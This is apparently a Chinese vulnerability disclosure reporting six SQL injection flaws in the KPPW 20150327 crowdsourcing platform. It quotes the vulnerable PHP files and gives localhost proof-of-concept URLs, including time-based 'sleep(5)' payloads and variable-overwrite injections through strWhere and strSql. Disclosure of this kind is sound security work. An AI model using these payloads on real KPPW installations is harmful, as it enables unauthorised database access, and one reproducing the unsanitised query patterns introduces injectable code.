### 简要描述:
洞太多啦
### 详细说明:
KPPW 最新版20150327
第一处注入:
漏洞文件:/control/tasklist.php
```
$m = intval($m);
$i = intval($i);
$s = intval($s);
$r = intval($r);
$o = intval($o);
$pd = intval($pd);
```
```
$m and $strUrl .="&m=".$m;
$s and $strUrl .="&s=".$s;
$r and $strUrl .="&r=".$r;
$i and $strUrl .="&i=".$i;
$pd and $strUrl .="&pd=".$pd;
$o and $strUrl .="&o=".$o;
$p and $strUrl .="&p=".intval($p);
$ky and $strUrl .="&ky=".$ky;
```
2处代码未对$p 参数进行intval
```
if (intval ( $p )) {
$strWhere .= " and a.province = ".intval($p);
$two=db_factory::get_table_data("*","witkey_district","upid=".$p);
}
```
intval判断 轻松绕过造成注入
证明:
http://127.0.0.1/kppw0327/index.php?do=tasklist&m=2&s=2&r=2&o=5&p=1 || sleep(5)
[<img src="https://images.seebug.org/upload/201504/28161214a74e189b812ccf40ef1332bdcaffdf09.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/28161214a74e189b812ccf40ef1332bdcaffdf09.png)
第二处注入:
/control/goodslist.php
```
$m and $strUrl .="&m=".intval($m);
$intPage and $strUrl .="&intPage=".intval($intPage);
$i and $strUrl .="&i=".intval($i);
$pd and $strUrl .="&pd=".intval($pd);
$o and $strUrl .="&o=".strval($o);
$p and $strUrl .="&p=".intval($p);
$ky and $strUrl .="&ky=".$ky;
```
$p参数依然没intval
```
if (intval ( $p )) {
$strWhere .= " and a.province = ".intval($p);
$two=db_factory::get_table_data("*","witkey_district","upid=".$p);
}
```
同样造成注入
证明:
http://127.0.0.1/kppw0327/index.php?do=goodslist&m=2&s=2&r=2&o=5&p=1 || 1=sleep(5)
[<img src="https://images.seebug.org/upload/201504/28161609e1e2ce34221a75b6ad5fe4773c860c43.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/28161609e1e2ce34221a75b6ad5fe4773c860c43.jpg)
第三处注入:
漏洞文件同上
```
if (intval ( $twoid )) {
$arrCitytwo = CommonClass::getDistrictById($twoid);
$strWhere .= " and a.city = ".intval($twoid);
$three=db_factory::get_table_data("*","witkey_district","upid=".$twoid);
$twoid and $strUrl .="&twoid=".intval($twoid);
}
```
类似一样的
证明:
http://127.0.0.1/kppw0327/index.php?do=goodslist&m=7&m=0&twoid=1xxx
[<img src="https://images.seebug.org/upload/201504/28161756e44f827a08d461ba4e7075342d22d6e7.jpg" alt="3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/28161756e44f827a08d461ba4e7075342d22d6e7.jpg)
### 漏洞证明:
第四处:
漏洞文件:/control/ajax/balance.php
```
$id=intval($id);
$orderId=intval($orderId);
$arrMemer=db_factory::get_one("select * from ".TABLEPRE."witkey_member where uid=".$gUid);
$twoPassword = keke_user_class::get_password ( $arrMemer['password'], $arrMemer['rand_code'] );
if (isset($formhash)&&kekezu::submitcheck($formhash)) {
$sec_code=kekezu::escape(trim($zfpwd));
$strMd5Pwd = keke_user_class::get_password ( $sec_code, $gUserInfo ['rand_code'] );
$arrUserInfo=db_factory::get_one(sprintf("select * from %switkey_space where uid=%d and sec_code='%s'",TABLEPRE,intval($gUid),$strMd5Pwd));
switch ($type){
case 'task':
$fina_type="pub_".$type;
$tips='你已经支付成功了,不需要再次支付!';
$stryzfUrl='index.php?do=task&id='.intval($id);
$strwzfUrl='index.php?do=yepay&type='.$type.'&id='.intval($id);
$strSql="select * from ".TABLEPRE."witkey_finance where obj_id=".intval($id)." and fina_action='.$fina_type.'";
break;
case 'goods':
$fina_type="buy_service";
$tips='你已经支付成功了,不需要再次支付!';
$stryzfUrl='index.php?do=goods&id='.intval($id);
$strwzfUrl='index.php?do=order&sid='.$id.'&step=step2&orderId='.$orderId.'&action=confirm_pay';
$strSql="select * from ".TABLEPRE."witkey_finance where order_id=".intval($orderId)." and fina_action='.$fina_type.'";
break;
case 'service':
$fina_type="buy_service";
$tips='你已经支付成功了,不需要再次支付!';
$stryzfUrl='index.php?do=goods&id='.intval($id);
$strwzfUrl='index.php?do=order&sid='.$id.'&step=step3&orderId='.$orderId.'&action=pay';
$strSql="select * from ".TABLEPRE."witkey_finance where order_id=".intval($orderId)." and fina_action='.$fina_type.'";
break;
case 'pubservice':
$tips='你已经支付成功了,不需要再次支付!';
$stryzfUrl='index.php?do=goods&id='.intval($id);
$strwzfUrl='index.php?do=yepay&type=service&id='.intval($id)."&orderId=".$orderId;
$strSql="select * from ".TABLEPRE."witkey_order where order_id=".intval($orderId)." and order_status='ok'";
break;
case 'gy':
$fina_type="buy_gy";
$tips['errors']['zfpwd'] = '你已经支付成功了,不需要再次支付!';
$stryzfUrl=NULL;
$strwzfUrl='index.php?do=gy&id='.$id.'&step=step3&orderId='.$orderId.'&action=pay';
$strSql="select * from ".TABLEPRE."witkey_order where order_id=".intval($orderId)." and order_status='ok'";
break;
case 'taskCash':
$fina_type="hosted_reward";
$tips='你已经支付成功了,不需要再次支付!';
$stryzfUrl='index.php?do=task&id='.intval($id);
$strwzfUrl="index.php?do=taskhandle&op=consign&taskId=".$id;
$strSql="select * from ".TABLEPRE."witkey_finance where obj_id=".intval($id)." and fina_action='.$fina_type.'";
break;
}
if($arrUserInfo && $type){
$arrFinance=db_factory::get_one($strSql);
if($arrFinance){
kekezu::show_msg($tips,$stryzfUrl,'','','success');
```
还是先看下kppw的参数获取方式
```
$_R = $_REQUEST;
$_R = kekezu::k_input ( $_R );
$_GET = kekezu::k_input($_GET);
$_POST = kekezu::k_input($_POST);
$_R and extract ( $_R, EXTR_SKIP );
```
可以看到$strSql是在每个case中赋值的 如果我们$type=xxx
进入switch却又进入不了每个case
那么可以自己传入$strSql参数
```
$arrFinance=db_factory::get_one($strSql);
```
在这里进入查询
证明:
此处需注册个账号 支付密码也得填你自己真正的支付密码 即可
[<img src="https://images.seebug.org/upload/201504/28163029b42022dbc697e507eed5c16e3f2cd964.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/28163029b42022dbc697e507eed5c16e3f2cd964.png)
第五处注入:
漏洞文件:/control/ajax/banner.php
```
if($_R['a']==1){
$arr['shop_background']="";
db_factory::updatetable(TABLEPRE."witkey_shop", $arr, "uid=".$_R['id']);
kekezu::show_msg('已清除','index.php?do=seller&id='.intval($id),NULL,NULL,'ok');
}elseif($_R['a']==2){
$arr['banner']="";
db_factory::updatetable(TABLEPRE."witkey_shop", $arr, "uid=".$_R['id']);
kekezu::show_msg('已清除','index.php?do=seller&id='.intval($id),NULL,NULL,'ok');
}
```
a 为1或2 都行
$_R['id'] 直接放入查询
证明:
http://127.0.0.1/kppw0327/index.php?do=ajax&view=banner&a=1&id=1xxxx
[<img src="https://images.seebug.org/upload/201504/2816340046e766ee20a62a2109eef6748099c108.png" alt="5.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/2816340046e766ee20a62a2109eef6748099c108.png)
第六处注入:
漏洞文件:/control/articlelist.php
```
<?php defined ( 'IN_KEKE' ) or exit ( 'Access Denied' );
$strNavActive = 'articlelist';
$strUrl = $_K['siteurl']."/index.php?do=articlelist";
$catid and $strUrl .="&catid=".intval($catid);
$intPage and $strUrl .="&intPage=".$intPage;
$arrArtCats = kekezu::get_table_data ( "*", "witkey_article_category", "cat_type='article' and art_cat_pid=1", "listorder asc", "", "", "", null );
$page and $intPage = intval($page);
$intPage = intval ( $intPage ) ? $intPage : 1;
$intPagesize = intval ( $intPagesize ) ? $intPagesize : 20;
intval($catid) and $intCatid = intval($catid) or $intCatid = intval($arrArtCats['0']['art_cat_id']);
$intCatid and $strWhere .= " and a.art_cat_id = $intCatid";
$strWhere.=" and a.is_show!=2";
$strWhere .=" order by is_recommend desc,a.listorder asc,pub_time desc";
$strSql = "select a.* ,b.cat_name from " . TABLEPRE . "witkey_article a left join " . TABLEPRE . "witkey_article_category b on a.art_cat_id=b.art_cat_id where b.cat_type='article' $strWhere";
```
$strWhere第一次出现都是 $strWhere .= 来添加 未见到定义
那么可以直接传入初始值 后面都是 .= 添加 无影响
证明:
http://127.0.0.1/kppw0327/index.php?do=articlelist&strWhere=%20and%201=1%23
[<img src="https://images.seebug.org/upload/201504/281639449b1d33ab0d20e3ef820bf48de087dd2c.jpg" alt="6.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/281639449b1d33ab0d20e3ef820bf48de087dd2c.jpg)
京公网安备 11010502034610号
暂无评论